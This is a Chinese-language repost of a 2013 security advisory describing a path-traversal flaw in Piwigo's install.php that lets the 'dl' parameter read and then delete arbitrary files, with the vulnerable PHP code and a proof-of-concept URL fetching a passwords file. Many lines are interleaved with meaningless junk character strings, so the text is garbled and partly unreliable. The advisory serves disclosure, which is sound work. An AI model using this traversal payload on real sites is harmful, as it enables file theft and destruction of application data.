Piwigo任意文件泄露和任意文件删除漏洞

admin

Piwigo是用PHP编写的相册脚本。
+ m/ Q3 b( V# B9 }, P1 I; l/ G
Piwigo 2.4.6及其他版本没有正确验证install.php脚本的 'dl'参数值，在实现上存在安全漏洞，攻击者可利用这些漏洞查看受影响计算机上的任意文件，删除受影响应用上下文内的任意文件。
0 Y. z* i; @# a5 d1 E0 c====================================================================
% \5 l9 k8 F$ }1 Z& p' J- _/install.php:
! s' \( p& o% y-------------
113: if (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']))
$ ~  w% U4 {9 {1 ]114: {
115:   $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];
116:   header('Cache-Control: no-cache, must-revalidate');
8 p) R% G* t2 x9 b117:   header('Pragma: no-cache');
7 f# L* h8 v% N8 f118:   header('Content-Disposition: attachment; filename="database.inc.php"');
' z+ I' w2 s- `/ z  d' a2 y& c# T" t119:   header('Content-Transfer-Encoding: binary');
120:   header('Content-Length: '.filesize($filename));
4 ]5 r- Z5 a$ G; ~& y3 Z' y0 y0 l121:   echo file_get_contents($filename);
122:   unlink($filename);
9 h8 G3 w! K+ x% M6 R123:   exit();
124: }
# W! R3 L- q7 f5 X2 Y* e4 v& I- o$ z1 l====================================================================

* P* L% D8 g$ b0 tTested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Apache 2.4.2 (Win32)
4 ~! H+ K+ D- q. L0 ?  L4 q/ w           PHP 5.4.4
# x5 `/ ?# K- S+ x/ c  ?2 V           MySQL 5.5.25a
' s" k7 f1 Q. I( h8 m5 z& }7 c* h
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
- b- m/ O: f8 U6 k8 [                            @zeroscience
1 d2 K$ O6 i- N0 `1 y% K
- }6 J4 c7 ^1 {6 u  d' l( K/ ZAdvisory ID: ZSL-2013-5127
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5127.php
Vendor Patch: http://piwigo.org/bugs/view.php?id=2843
7 t9 c+ N7 i  H) ~6 D; h" B5 g
15.02.2013

--
http://localhost/piwigo/install.php?dl=../../../../../../lio_passwords.txt

) ~; s$ _! g/ n$ m' `9 P# B! S